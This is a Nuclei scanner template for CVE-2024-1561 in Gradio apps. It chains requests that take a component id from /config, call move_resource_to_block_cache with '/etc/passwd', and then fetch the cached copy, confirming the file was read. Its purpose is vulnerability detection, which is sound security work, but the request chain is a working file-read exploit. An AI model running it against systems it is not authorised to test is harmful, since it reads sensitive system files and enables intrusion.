id: gradio-local-file-include
info:
  name: Gradio Local File Read Vulnerability
  author: ozelis, DanMcInerney, daffainfo
  severity: high
  description: This nuclei template checks for Local File Read vulnerability in Gradio applications.
  reference:
    - https://huntr.com/bounties/4acf584e-2fe8-490e-878d-2d9bf2698338
    - https://github.com/gradio-app/gradio/commit/24a583688046867ca8b8b02959c441818bdb34a2
  classification:
    cvss-score: 7.5
    cwe-id: CWE-29
    cve-id: CVE-2024-1561
  tags: gradio, lfi, local-file-include, python, api, ai, machine-learning, huntr

flow: http(1) && http(2) && http(3)

http:
  - method: GET
    path:
      - "{{BaseURL}}/config"

    extractors:
      - type: json
        part: body
        name: component_id
        internal: true
        json:
          - ".components[0].id"

  - raw:
      - |
        POST /component_server HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
          "component_id": "{{component_id}}",
          "data": "/etc/passwd",
          "fn_name": "move_resource_to_block_cache",
          "session_hash": "aaaaaaaaaaa"
        }

    extractors:
      - type: regex
        part: body
        name: extracted_content
        internal: true
        group: 1
        regex: 
          - '"(.+)"' 

  - method: GET
    path:
      - "{{BaseURL}}/file={{extracted_content}}"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200